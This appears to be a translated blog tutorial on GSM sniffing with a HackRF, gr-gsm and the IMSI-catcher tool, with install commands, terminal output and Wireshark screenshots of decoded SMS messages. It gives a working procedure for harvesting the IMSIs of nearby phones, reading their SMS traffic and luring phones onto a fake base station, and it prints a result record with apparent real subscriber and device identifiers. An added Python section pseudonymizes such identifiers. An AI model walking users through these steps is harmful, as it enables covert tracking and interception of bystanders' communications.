D~DIDI~DIDIDI!!!!


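GSM Sniffing

Using a HackRF together with kalibrate-hackrf, you can quickly locate GSM frequencies.

kalibrate-hackrf hops between the known GSM frequencies and can identify which frequencies are in use in your country.

Install gr-gsm; after gr-gsm has processed the signal, the GNU Radio modules decode the GSM packets.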

sudo apt-get install git cmake libboost-all-dev libcppunit-dev swig doxygen liblog4cpp5-dev python-scipy
git clone https://github.com/ptrkrysik/gr-gsm.git
cd gr-gsm
mkdir build
cd build
cmake ..
make
sudo make install
sudo ldconfig

The IMSI can be obtained with tshark,

or you can download IMSI-catcher and use it to obtain IMSIs.

git clone https://github.com/Oros42/IMSI-catcher.git

Install the dependencies; python3 can be used.

sudo apt install python-numpy python-scipy python-scapy

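Change into the IMSI-catcher directory.

Run this command to start automatic GSM frequency detection and data capture and parsing; the server port is 4730.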

python3 scan-and-livemon

skygo-sdr:IMSI-catcher (master*) $ python3 scan-and-livemon
scan-and-livemon:18: DeprecationWarning: the imp module is deprecated in favour of importlib; see the module's documentation for alternative uses
  import imp
Locating potential GSM base station frequencies (this can take a few minutes) .
Found 2 frequences
Listening on the frequencies for 1 potential GSM base stations.
Starting livemon for freqency 945000000, server on port 4730
[INFO] [UHD] Linux; GNU C++ version 9.2.1 29200394; Boost 107100; UHD 3.15.0.O-2bui1d5
gr-osmosdr 0.2.0.0 (0.2.0) gnuradio 3.8.1.0
built-in source types: file osmosdr fcd rtl rtl tcp uhd miri hackrf bladerf rfspace airspy airspyhf soapy redpitaya freesrp
Using HackRF One with firmware 2018.01.1

Run tshark to look up IMSIs directly:

sudo tshark -i lo -Y "e212.imsi" -V 2>&1 | sed 's/^[ \t]*//;s/[ \t]*$//' 2>&1 | grep "IMSI:"

Run this command to look for IMSIs and related information in the data; the default port is 4729 and can be specified manually.

python3 simple_IMSI-catcher.py -p 4729

You can also run sudo python3 simple_IMSI-catcher.py -s

[Screenshot: terminal output of simple_IMSI-catcher.py -s, a table with the columns Nb IMSI, TMSI-1, TMSI-2, IMSI, country, brand, operator, MCC, LAC, CellId, Timestamp]

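Wireshark can capture a large amount of information, including IMSIs and SMS messages. First, by having the phone actively attach to your own base station, you can obtain the IMSI; then more information can be obtained through grgsm.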

{"status": true, "message_id": 1, "message": "Success", "infos": [["460022978370785", "351615087961130", "", null]]}
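Results like the one above carry subscriber and device identifiers, so they are worth pseudonymizing before they go into lab notes or reports. The following is an added example, not part of the original post or of IMSI-catcher; the field order of the "infos" rows (IMSI, then IMEI), the MNC-length table and the key are assumptions.

```python
import hashlib
import hmac
import json

# MNC length by MCC: small illustrative subset (assumption), not the full ITU list.
MNC_LEN = {"460": 2, "262": 2, "310": 3}

def split_imsi(imsi):
    """Split an IMSI into (MCC, MNC, MSIN); raise ValueError if malformed."""
    if not (imsi.isascii() and imsi.isdigit() and 6 < len(imsi) <= 15):
        raise ValueError("IMSI must be 7-15 decimal digits")
    mcc = imsi[:3]
    mnc_end = 3 + MNC_LEN.get(mcc, 2)  # default to 2 digits when the MCC is unknown
    return mcc, imsi[3:mnc_end], imsi[mnc_end:]

def _token(key, value):
    """Keyed, non-reversible stand-in for a subscriber number or device serial."""
    return hmac.new(key, value.encode(), hashlib.sha256).hexdigest()[:12]

def pseudonymize_imsi(imsi, key):
    """Keep MCC and MNC (they identify the network), replace the MSIN (the subscriber)."""
    mcc, mnc, msin = split_imsi(imsi)
    return f"{mcc}{mnc}-{_token(key, msin)}"

def pseudonymize_imei(imei, key):
    """Keep the 8-digit TAC (device model), replace the serial and check digit."""
    if not (imei.isascii() and imei.isdigit() and len(imei) in (15, 16)):
        raise ValueError("IMEI/IMEISV must be 15 or 16 digits")
    return f"{imei[:8]}-{_token(key, imei[8:])}"

def redact_record(raw, key):
    """Redact a JSON result whose "infos" rows start with [IMSI, IMEI, ...] (assumed)."""
    rec = json.loads(raw)
    for row in rec.get("infos", []):
        if row[0]:
            row[0] = pseudonymize_imsi(row[0], key)
        if len(row) > 1 and row[1]:
            row[1] = pseudonymize_imei(row[1], key)
    return json.dumps(rec)

# Constructed sample (not real identifiers) and a lab-only key.
SAMPLE = '{"status": true, "infos": [["460001234567890", "490154203237518", "", null]]}'
if __name__ == "__main__":
    print(redact_record(SAMPLE, b"lab-notebook-key"))
```

The same key maps the same identifier to the same token, so repeated sightings can still be correlated inside one report without storing the raw IMSI or IMEI.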

[Screenshot: Wireshark dissection of a GSM A-I/F RP-DATA (Network to MS) message carrying a GSM 03.40 SMS-DELIVER TPDU, showing the RP-Originator Address, RP-Destination Address, TP-Originating-Address, TP-PID, TP-DCS, TP-Service-Centre-Time-Stamp, TP-User-Data-Length and TP-User-Data (SMS text) fields]

[Screenshot: Wireshark dissection of a second GSM A-I/F DTAP CP-DATA / RP-DATA (Network to MS) message carrying a GSM 03.40 SMS-DELIVER TPDU, here with a User-Data Header in TP-User-Data, showing the RP-Originator Address, TP-Originating-Address, TP-PID, TP-DCS, TP-Service-Centre-Time-Stamp and SMS text fields]

Oros42/IMSI-catcher: This program show you IMSI numbers of cellphones around you. (github.com)

It can be run locally, or directly with Docker:

docker pull atomicpowerman/imsi-catcher

docker run -ti --net=host -e DISPLAY=$DISPLAY --privileged -v /dev/bus/usb:/dev/bus/usb --name=gsm_imsi_catcher atomicpowerman/imsi-catcher bash